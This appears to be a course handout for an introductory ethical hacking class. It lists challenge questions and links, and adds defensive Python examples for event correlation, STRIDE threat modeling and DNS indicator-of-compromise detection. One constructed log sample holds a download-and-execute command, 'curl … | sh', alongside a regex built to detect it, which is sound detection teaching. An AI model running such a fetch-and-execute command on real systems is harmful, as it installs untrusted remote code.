
Ethical Hacking: Introduction to Ethical Hacking

with Lisa Bock

Challenges and hyperlinks for each chapter


Note: Links may change or be unavailable over time.

Chapter 1. Protect Data in a Digital World


01_01. Recognizing elements of information security
Challenge Question
Q. Review the importance of ensuring data confidentiality, integrity, and availability.

01_02. Providing information assurance

• Data breaches and cyberattacks will most likely continue. More and more data is being generated every day, as shown here: https://www.statista.com/statistics/273550/data-breaches-recorded-in-the-united-states-by-number-of-breaches-and-records-exposed/.
• Just what’s at risk? Let’s take a look at a mind map for internet infrastructure assets found at the European Union Agency for Cybersecurity: https://www.enisa.europa.eu/topics/cyber-threats/threats-and-trends/enisa-thematic-landscapes/threat-landscape-of-the-internet-infrastructure. Once there, select and open the link “Detailed Mind Map for Internet Infrastructure Assets,” which shows all the potentially vulnerable targets in an infrastructure.
Challenge Question
Q. Explain why ethical hacking helps provide “due care” in defending an infrastructure’s
security posture.

01_03. Defending in depth

• Every day more and more services are being added to the network, making security a
constant challenge. Visit https://cybermap.kaspersky.com/ to see many active attacks
around the world.
Challenge Question
Q. A layered approach, with controls at multiple points, helps defend against many classes of attack. Summarize how a layered approach uses three basic elements: technical controls, administrative controls, and people.

Ethical Hacking: Introduction to Ethical Hacking with Lisa Bock 1 of 9


01_04. Using AI and ML in cybersecurity
Challenge Question
Q. Artificial intelligence (AI) and machine learning (ML) are two powerful allies in cybersecurity.
Explain some of the ways AI and ML can help prevent cyberattacks.

01_05. Adapting to the threats

• Learn more about the NIST Cybersecurity Framework’s five functions (Identify, Protect, Detect, Respond, and Recover) by visiting: https://www.nist.gov/cyberframework/online-learning/five-functions. Note that CSF 2.0, released in February 2024, adds a sixth function, Govern.
Challenge Question
Q. A continual/adaptive security strategy provides a proactive approach to securing the data.
Discuss various methods of continually monitoring network activity.

01_06. Leveraging event correlation

Challenge Question
Q. Event correlation analyzes multiple events to identify relationships, patterns, and connections among them. Discuss how event correlation, along with next-generation detection, can stop threats on the network.
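The kind of correlation described above, as an added example that is not part of the course materials: two separate log sources (an SSH authentication log and a process-execution log, both constructed samples) are joined on source address, account, and time. Several failed logins followed by a success from the same address is already an alert; a download-and-execute command run by that account minutes later raises its severity. The technique IDs are references to MITRE ATT&CK (T1110 Brute Force, T1059 Command and Scripting Interpreter); the log formats and thresholds are assumptions for the example.

```python
"""Event correlation over two log sources (added example, not code from the course).
The SSH auth log and the process log below are constructed samples."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample data: four failed logins and a success from one address,
# followed by a download-and-execute command run by the same account.
AUTH_LOG = """\
2024-03-02T10:00:01 sshd: Failed password for admin from 203.0.113.7
2024-03-02T10:00:03 sshd: Failed password for admin from 203.0.113.7
2024-03-02T10:00:04 sshd: Failed password for admin from 203.0.113.7
2024-03-02T10:00:06 sshd: Failed password for admin from 203.0.113.7
2024-03-02T10:00:09 sshd: Accepted password for admin from 203.0.113.7
2024-03-02T10:05:00 sshd: Failed password for bob from 198.51.100.9
2024-03-02T10:06:00 sshd: Accepted password for bob from 198.51.100.9
"""
PROC_LOG = """\
2024-03-02T10:00:30 host=web01 user=admin cmd="curl http://203.0.113.7/x.sh | sh"
2024-03-02T10:06:30 host=web01 user=bob cmd="ls -la"
"""

AUTH_RE = re.compile(r"^(\S+) sshd: (Failed|Accepted) password for (\S+) from (\S+)$")
PROC_RE = re.compile(r'^(\S+) host=(\S+) user=(\S+) cmd="(.*)"$')
# Piping a download straight into a shell is a common first post-login action.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")


def parse_auth(text):
    """Yield (timestamp, outcome, user, source ip) for each auth line."""
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if m:
            ts, outcome, user, ip = m.groups()
            yield datetime.fromisoformat(ts), outcome, user, ip


def parse_proc(text):
    """Yield (timestamp, host, user, command) for each process line."""
    for line in text.splitlines():
        m = PROC_RE.match(line)
        if m:
            ts, host, user, cmd = m.groups()
            yield datetime.fromisoformat(ts), host, user, cmd


def correlate(auth_text, proc_text, fail_threshold=3,
              fail_window=timedelta(seconds=60), follow_window=timedelta(minutes=10)):
    """Stage 1: at least fail_threshold failures then a success for the same
    (source, user) inside fail_window -> brute force (ATT&CK T1110).
    Stage 2: a download-and-execute command by that user within follow_window
    of the success (T1059) raises the alert to high severity."""
    failures = defaultdict(list)          # (ip, user) -> timestamps of failures
    procs = list(parse_proc(proc_text))
    alerts = []
    for ts, outcome, user, ip in parse_auth(auth_text):
        key = (ip, user)
        if outcome == "Failed":
            failures[key].append(ts)
            continue
        recent = [t for t in failures[key] if ts - t <= fail_window]
        failures[key].clear()              # a success resets the counter either way
        if len(recent) < fail_threshold:
            continue
        alert = {"src": ip, "user": user, "at": ts.isoformat(), "failures": len(recent),
                 "techniques": ["T1110"], "severity": "medium"}
        for pts, host, puser, cmd in procs:
            if (puser == user and timedelta(0) <= pts - ts <= follow_window
                    and DOWNLOAD_EXEC.search(cmd)):
                alert.update(severity="high", host=host, command=cmd)
                if "T1059" not in alert["techniques"]:
                    alert["techniques"].append("T1059")
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in correlate(AUTH_LOG, PROC_LOG):
        print(a)
```

Neither source alone is conclusive: one failed login for bob is noise, and a curl-pipe-sh is something an administrator may legitimately type. It is the sequence across the two sources, bound to the same principal and a tight time window, that turns two low-value events into one high-confidence alert.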

Chapter 2. Maintain a Vigilant Posture


02_01. Modeling threats

• To see an example of a threat modeling tool, visit: https://www.visual-paradigm.com/features/threat-modeling-tool/.
• Visit https://learn.microsoft.com/en-us/azure/security/develop/threat-modeling-tool
to download Microsoft’s Threat Modeling Tool.
• To learn more about tactical threat modeling, download the following:
https://safecode.org/wp-content/uploads/2017/05/SAFECode_TM_Whitepaper.pdf.
Challenge Question
Q. Outline how threat modeling helps identify weaknesses at each entry point so they can be mitigated before an attacker exploits them.
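As an added example (not code from the course or from any of the tools linked above), the following is a small STRIDE-per-element enumerator: the step a threat modeling tool performs in the background when it derives candidate threats from the elements and flows of a data-flow diagram. Flows that cross a trust boundary are the entry points, so their threats are flagged high priority, and a mitigation already present in the model (transport encryption, peer authentication) is recorded beside the threat it addresses. The three-tier web application model is constructed for the example.

```python
"""STRIDE-per-element threat enumeration from a data-flow model (added example,
not code from the course or from any threat modeling tool). The model is constructed."""
from dataclasses import dataclass

STRIDE = {"S": "Spoofing", "T": "Tampering", "R": "Repudiation",
          "I": "Information disclosure", "D": "Denial of service",
          "E": "Elevation of privilege"}

# STRIDE-per-element: the threat classes that apply to each DFD element type.
APPLICABLE = {"external": "SR", "process": "STRIDE", "store": "TRID", "flow": "TID"}


@dataclass(frozen=True)
class Element:
    name: str
    kind: str   # "external", "process" or "store"
    zone: str   # trust zone the element lives in


@dataclass(frozen=True)
class Flow:
    name: str
    src: Element
    dst: Element
    encrypted: bool = False
    authenticated: bool = False


def enumerate_threats(elements, flows):
    """Return one candidate threat per (target, STRIDE category). A flow that
    crosses a trust boundary is an entry point and gets high priority; mitigations
    already modelled are recorded so the reviewer can judge whether they suffice."""
    threats = []
    for e in elements:
        for c in APPLICABLE[e.kind]:
            threats.append({"target": e.name, "category": STRIDE[c],
                            "entry_point": False, "priority": "medium", "mitigations": []})
    for f in flows:
        crosses = f.src.zone != f.dst.zone
        for c in APPLICABLE["flow"]:
            mitigations = []
            if c in "TI" and f.encrypted:
                mitigations.append("transport encryption")
            if c == "T" and f.authenticated:
                mitigations.append("authenticated peer")
            threats.append({"target": f"{f.name} ({f.src.name} -> {f.dst.name})",
                            "category": STRIDE[c], "entry_point": crosses,
                            "priority": "high" if crosses else "medium",
                            "mitigations": mitigations})
    return threats


def entry_points(threats):
    """Distinct targets sitting on a trust boundary, i.e. where attacks enter."""
    return sorted({t["target"] for t in threats if t["entry_point"]})


# Constructed three-tier model: browser -> web app -> database, plus a cache in the DMZ.
BROWSER = Element("Browser", "external", "internet")
WEBAPP = Element("Web app", "process", "dmz")
DB = Element("Orders DB", "store", "internal")
CACHE = Element("Session cache", "store", "dmz")
MODEL = ([BROWSER, WEBAPP, DB, CACHE],
         [Flow("HTTPS request", BROWSER, WEBAPP, encrypted=True),
          Flow("SQL query", WEBAPP, DB, authenticated=True),
          Flow("Cache lookup", WEBAPP, CACHE)])

if __name__ == "__main__":
    for t in enumerate_threats(*MODEL):
        print(t["priority"], t["target"], "-", t["category"], t["mitigations"])
```

The output is a worklist, not a verdict: the unencrypted cache lookup stays medium only because both ends sit in the same zone, and the "authenticated peer" note on the SQL flow does nothing for the injection-style tampering that a reviewer still has to consider at the web app.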

02_02. Monitoring using cyberthreat intelligence



• Visit https://www.sans.org/, where you can find training and other resources.
• Many sources feed into intelligence, such as the Common Vulnerabilities and Exposures (CVE) program: https://www.cve.org/. CVE is a catalog of publicly disclosed vulnerabilities that assigns each one a standardized identifier (of the form CVE-YYYY-NNNNN), so that advisories, scanners, and threat feeds can all refer to the same flaw.
• Visit CISA.gov at https://www.cisa.gov/ais to learn about the automated indicator sharing
program that allows the US federal government and private sector to share threat indicators.
• Cyberthreat intelligence standards such as STIX and TAXII facilitate the exchange of threat
information by specifying data structures and communication protocols. Learn more here:
https://www.anomali.com/resources/what-are-stix-taxii.
• Cisco Talos provides threat intelligence. Learn more here: https://talosintelligence.com/.
Challenge Question
Q. Cyberthreat intelligence leverages past events in order to block and remediate potential
attacks. Outline the power of cyberthreat intelligence in maintaining a vigilant posture.

02_03. Following the threat intelligence lifecycle

• To read more about the Cyber Threat Intelligence Lifecycle, visit: https://flare.io/learn/resources/blog/threat-intelligence-lifecycle/.
• For an in-depth article on threat sharing, visit:
https://www.concordia-h2020.eu/blog-post/threat-intelligence-sharing/.
Challenge Question
Q. One method to defend against threats is by studying threat activity. Discuss the main
phases in the Cyber Threat Intelligence Lifecycle.

02_04. Managing incidents

• Malware can spread rapidly, as we see in this WannaCry animation: https://www.nytimes.com/interactive/2017/05/12/world/europe/wannacry-ransomware-map.html.
Challenge Question
Q. It’s critical to move quickly when an incident occurs, because delay can turn an incident into a disaster. List the steps to take after an incident.

02_05. Challenge/solution: Hardening guide

In this challenge, we’ll review mitigation strategies to protect network assets and reduce the risk of successful cyberattacks.

Go to https://www.cisa.gov/news-events/news/kaseya-ransomware-attack-guidance-affected-msps-and-their-customers and scroll down to “General Mitigation and Hardening Guidance for Small- and Mid-Sized Business MSP Customers” and list the six key guidelines that will help protect network assets and reduce the risk of successful cyberattacks.

Chapter 3. Summarize Hacking Frameworks


03_01. Understanding the Cyber Kill Chain

• Learn more about the Cyber Kill Chain and the meaning of advanced persistent threat by
visiting: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html#.
Challenge Question
Q. Discuss the Cyber Kill Chain along with the tactics, techniques, and procedures (TTPs) used
by the malicious actor during each phase.

03_02. Utilizing MITRE ATT&CK

• Learn more about the MITRE ATT&CK framework, found at https://attack.mitre.org/. Scroll down to the Enterprise matrix: each column is a tactic (the adversary’s goal, such as Initial Access or Lateral Movement), and the cells beneath it are the techniques used to reach that goal, which your team can emulate during an ethical hacking exercise.
Challenge Question
Q. The MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework is a knowledge base of adversary tactics and techniques drawn from real-world observations, which ethical hackers use to plan engagements and describe their findings. Review some of the elements in MITRE ATT&CK.

03_03. Analyzing using the Diamond Model

• To read more about the Diamond Model, go to https://apps.dtic.mil/sti/citations/ADA586960.
Challenge Question
Q. Step through the process of an intrusion event using the Diamond Model.



03_04. Identifying adversary behavior

Challenge Question
Q. Malicious actors use several techniques to infiltrate and move through a network. Compare the following adversary behaviors: command-line (CLI) execution, DNS tunneling, and lateral movement.

03_05. Discovering indicators of compromise

• Visit https://help.redcanary.com/hc/en-us/articles/360047863574-How-Red-Canary-works to see an example of an alert built from indicators of compromise.
• To follow along with my demonstration, go to https://www.malware-traffic-analysis.net/2020/12/07/index.html and download this file: 2020-12-07-Qakbot-with-Cobalt-Strike-and-spambot-activity.pcap.zip.
• For another example of a dashboard on PacketTotal that breaks down exactly what was going on in the file, go to: https://www.packettotal.com/app/analysis?id=6c844d0870f6325ac4c04dd7f90b9ded&name=signature_alerts.
• Once in Wireshark, use this filter: dns.qry.name == "smtp-relay.gmail.com". This shows the repeated DNS requests for Gmail’s SMTP relay, one of many mail servers the infected host looks up, which helps confirm an active spambot. In addition, use the smtp.data.fragment filter to show some of the spam emails.
Challenge Question
Q. Indicators of compromise (IoCs) are evidence that a cyberthreat may have infiltrated a system. Review some categories of IoCs.
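The three kinds of indicator touched on in this chapter and in 02_02, worked through in one added example that is not part of the course: atomic IoCs delivered as STIX 2.1 indicator objects (a domain name and an IPv4 address) are matched against DNS activity, and two behavioural IoCs are derived from the same records: a host resolving MX records for many domains, which is what the spambot in the demonstration capture does, and the many long, high-entropy labels under one base domain that characterise DNS tunneling (03_04). The STIX bundle, the simplified five-column DNS log, and the thresholds are all constructed for the example, and the pattern parser handles only the one-term STIX pattern form; real STIX patterns can be far richer.

```python
"""Indicators of compromise applied to DNS activity (added example, not code from
the course). The STIX 2.1 bundle and the DNS log below are constructed, and the
pattern parser only handles the one-term form "[<object>:value = '<literal>']"."""
import json
import math
import re
from collections import Counter, defaultdict

STIX_BUNDLE = json.dumps({
    "type": "bundle", "id": "bundle--00000000-0000-4000-8000-000000000001",
    "objects": [
        {"type": "indicator", "id": "indicator--00000000-0000-4000-8000-000000000002",
         "name": "constructed C2 domain", "pattern_type": "stix",
         "pattern": "[domain-name:value = 'c2.example.net']"},
        {"type": "indicator", "id": "indicator--00000000-0000-4000-8000-000000000003",
         "name": "constructed C2 address", "pattern_type": "stix",
         "pattern": "[ipv4-addr:value = '203.0.113.50']"},
    ]})

# Constructed, simplified DNS log: time, client, query type, query name, answer.
DNS_LOG = """\
10:00:01 10.0.0.5 A   c2.example.net 203.0.113.50
10:00:02 10.0.0.5 MX  gmail.com smtp-relay.gmail.com
10:00:02 10.0.0.5 MX  example-a.com mx.example-a.com
10:00:03 10.0.0.5 MX  example-b.com mx.example-b.com
10:00:03 10.0.0.5 MX  example-c.net mx.example-c.net
10:00:04 10.0.0.5 MX  example-d.org mx.example-d.org
10:00:04 10.0.0.5 MX  example-e.com mx.example-e.com
10:00:05 10.0.0.7 TXT k4q9mzx2pt7rv3bw8nh6cjd5.tun.example.org -
10:00:06 10.0.0.7 TXT a7f2k9wq3mzx8rbt5nv4hp6c.tun.example.org -
10:00:07 10.0.0.7 TXT z3r8w5qk2pm9tx7vb4nc6hj1.tun.example.org -
10:00:08 10.0.0.7 TXT m6p1xw9kq4zt3rv7nb2hc8jd.tun.example.org -
10:00:09 10.0.0.7 TXT t2n7kx5qz9wp3mv6rb4hc1jf.tun.example.org -
10:00:10 10.0.0.7 TXT w8q3zk6mp2xt9rv5nb7hc4jd.tun.example.org -
10:00:11 10.0.0.9 A   www.example.com 192.0.2.10
10:00:12 10.0.0.9 A   mail.example.com 192.0.2.11
"""

PATTERN_RE = re.compile(r"^\[(?P<obj>[\w-]+):value\s*=\s*'(?P<val>[^']*)'\]$")

def load_indicators(bundle_json):
    """Map each supported STIX object type to {value: indicator name}."""
    table = defaultdict(dict)
    for obj in json.loads(bundle_json)["objects"]:
        m = PATTERN_RE.match(obj.get("pattern", "")) if obj.get("type") == "indicator" else None
        if m:
            table[m["obj"]][m["val"]] = obj["name"]
    return table

def parse_dns(text):
    records = []
    for line in text.splitlines():
        ts, client, qtype, qname, answer = line.split()
        records.append({"ts": ts, "client": client, "qtype": qtype,
                        "qname": qname.lower().rstrip("."), "answer": answer})
    return records

def match_indicators(records, table):
    """Atomic IoCs: a queried name or a returned address that is on the indicator list."""
    hits = []
    for r in records:
        if r["qname"] in table["domain-name"]:
            hits.append((r["client"], table["domain-name"][r["qname"]], r["qname"]))
        if r["answer"] in table["ipv4-addr"]:
            hits.append((r["client"], table["ipv4-addr"][r["answer"]], r["answer"]))
    return hits

def detect_spambot(records, min_mx=5):
    """Behavioural IoC: a workstation resolving MX records for many domains is
    delivering mail directly, which is what a spambot does. (A production
    detector would also bound the count by a time window.)"""
    mx = defaultdict(set)
    for r in records:
        if r["qtype"] == "MX":
            mx[r["client"]].add(r["qname"])
    return sorted(c for c, names in mx.items() if len(names) >= min_mx)

def shannon_entropy(s):
    return -sum(n / len(s) * math.log2(n / len(s)) for n in Counter(s).values())

def detect_tunneling(records, min_unique=5, min_len=16, min_entropy=3.0):
    """Behavioural IoC for DNS tunneling: one client sends many distinct, long,
    high-entropy leading labels under the same base domain (data encoded in names)."""
    labels = defaultdict(set)   # (client, base domain) -> leading labels seen
    for r in records:
        parts = r["qname"].split(".")
        if len(parts) >= 3:
            labels[(r["client"], ".".join(parts[-2:]))].add(parts[0])
    flagged = []
    for (client, base), names in labels.items():
        mean_len = sum(map(len, names)) / len(names)
        mean_ent = sum(map(shannon_entropy, names)) / len(names)
        if len(names) >= min_unique and mean_len >= min_len and mean_ent >= min_entropy:
            flagged.append((client, base, len(names)))
    return flagged

def scan(bundle_json=STIX_BUNDLE, dns_text=DNS_LOG):
    records = parse_dns(dns_text)
    return {"indicator_hits": match_indicators(records, load_indicators(bundle_json)),
            "spambots": detect_spambot(records),
            "tunneling": detect_tunneling(records)}

if __name__ == "__main__":
    print(json.dumps(scan(), indent=2))
```

The atomic matches are exact and cheap but only catch infrastructure someone has already reported; the two behavioural checks need no feed at all and would fire on the capture used in the demonstration, at the cost of thresholds that have to be tuned against what is normal for the hosts being watched.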

03_06. Challenge/solution: The Cyber Kill Chain

In this three-part challenge, we’ll review the Cyber Kill Chain and a case study that steps through
an attack, from cyberattack to data breach. We’ll finish with a review of mitigation strategies to
protect network assets and reduce the risk of successful cyberattacks.

1. Go to https://ibrahimakkdag.medium.com/applied-explanation-of-the-cyber-kill-chain-model-as-a-cyber-attack-methodology-a5f666000820. List the main steps.
2. Go to Lockheed Martin at https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html#. Scroll down and provide an expanded definition of an advanced persistent threat (APT).
3. Download the case study at https://www.researchgate.net/publication/335024682_A_Cyber-Kill-Chain_based_taxonomy_of_crypto-ransomware_features/link/5fbff79e458515b797734e9d/download, which is a forensic exercise where the authors piece together the activities that led to this type of attack. Go to page 5 and list the six phases of this attack.

Chapter 4. Review Security Laws and Standards


04_01. Managing risks

Challenge Question
Q. Risk is a function of a threat exploiting a vulnerability. Explain the relationship between
risk, threats, and vulnerabilities.

04_02. Inventorying assets

• Maintaining an inventory of all in-scope system components is mandatory under PCI DSS (requirement 2.4 in v3.2.1, requirement 12.5.1 in v4.0), as outlined in this article: https://www.pcidssguide.com/what-is-inventory-and-asset-management-for-pci-compliance/.
• For a quick guide on PCI DSS standards, visit:
https://www.pcisecuritystandards.org/pdfs/pci_ssc_quick_guide.pdf.
• During a risk analysis exercise, the team will need to inventory all assets and then assign each a business value based on how critical it is to business operations. Visit https://www.cisecurity.org/white-papers/cis-hardware-and-software-asset-tracking-spreadsheet/, where you can download a free template to evaluate all assets and record how they are protected.
Challenge Question
Q. An organization has multiple assets that can be at risk of a cyberattack. Describe the
different types of assets, along with ways to conduct an inventory.

04_03. Defining information security standards

• FISMA (the Federal Information Security Modernization Act) is the US law that requires federal agencies and their contractors to implement information security programs; the supporting standards and guidelines are developed by NIST. Learn more here: https://csrc.nist.gov/projects/risk-management/fisma-background.
• ISO/IEC 27001 is an international standard that specifies the requirements for establishing, implementing, maintaining, and continually improving an organization’s information security management system (ISMS). Visit https://www.iso27001security.com/html/27001.html for more information.



• Visit https://www.iso27001security.com/html/toolkit.html, where you can find a toolkit
for ISO/IEC 27001.
Challenge Question
Q. An organization must incorporate safeguards into the security compliance plan to
defend against attacks. Outline the main elements of FISMA along with ISO/IEC 27001.

04_04. Outlining US regulations

• US lawmakers created the Sarbanes-Oxley Act of 2002 (SOX) in response to several corporate accounting scandals that occurred between the years 2000 and 2002. Learn more here: https://envoice.eu/en/blog/the-10-worst-accounting-scandals-in-us-history/.
Challenge Question
Q. The US has several laws that set requirements for how organizations handle data and systems. Describe the main elements of the Sarbanes-Oxley Act (SOX), the Health Insurance Portability and Accountability Act (HIPAA), and the Digital Millennium Copyright Act (DMCA).

04_05. Exploring global cyber laws and standards

• The General Data Protection Regulation (GDPR) requires that personal data be protected; Article 32 calls for a process for regularly testing, assessing, and evaluating the effectiveness of an organization’s security measures. The site https://gdpr.eu/ hosts the text of the regulation and a compliance checklist that covers this requirement, with the goal of preventing a data breach.
Challenge Question
Q. Unlike most US data protection laws, several regulations and standards reach beyond one country’s borders. Discuss global cyber laws and standards, including PCI DSS (an industry standard rather than a law), GDPR, and the UK Data Protection Act 2018.

04_06. Challenge/solution: Cyberthreat information sharing

In this challenge, we’ll review key elements of NIST Special Publication 800-150, Guide to Cyber
Threat Information Sharing. Visit https://csrc.nist.gov/publications/detail/sp/800-150/final and
select local download.

Once open, go to section:

• 2.1 Threat Information Types, and list and define the five main types of threat information.
• 2.2 Benefits of Information Sharing and list the four main benefits of information sharing.
To see an example of a cybersecurity advisory, visit: https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3389044/us-agencies-and-allies-partner-to-identify-russian-snake-malware-infrastructure/.

Chapter 5. Support Ethical Hacking


05_01. Comparing attack types and motives

• Today, we face a variety of passive and active attacks, as we see in this live threat map:
https://livethreatmap.radware.com/.
Challenge Question
Q. Today, we face a variety of attacks. Compare the different types of attacks, along with
outlining some of the motives and objectives of cybercrime.

05_02. Outlining the types of hackers

• Where is the dark web? This diagram compares the surface web, deep web, and dark web: https://sopa.tulane.edu/sites/default/files/2105-TulaneSoPA-CustomBlogGraphics-KG-B-02.jpg.
• TorFlow at https://torflow.uncharted.software visualizes traffic flowing between Tor relays. Tor’s anonymity serves many legitimate users, but it also lets threat actors communicate with one another without revealing who or where they are.
Challenge Question
Q. Not all hackers are the same. Compare the different types of hackers, such as unauthorized,
authorized, and semi-authorized hackers, along with subcategories of semi-authorized and
unauthorized hackers.

05_03. Recognizing the skills of an ethical hacker

Challenge Question
Q. In order to be exceptional at ethical hacking, the individual must have a wide range of
hard and soft skills. List some of the skills of an ethical hacker and outline the scope and
limitations of ethical hacking.

05_04. Stepping through the hacking phases

Challenge Question
Q. An ethical hacking exercise goes through five stages. Review the main hacking phases:
reconnaissance, scanning, gaining access, maintaining access, and covering tracks.



05_05. Grasping the importance of ethical hacking

Challenge Question
Q. Ethical hacking evaluates a system to identify vulnerabilities that could be exploited by
malicious actors. Describe the importance of ethical hacking in testing a network’s defenses.

Conclusion
06_01. Next steps

• To see a list of courses on my home page, visit: https://www.linkedin.com/learning/instructors/lisa-bock?u=2125562.
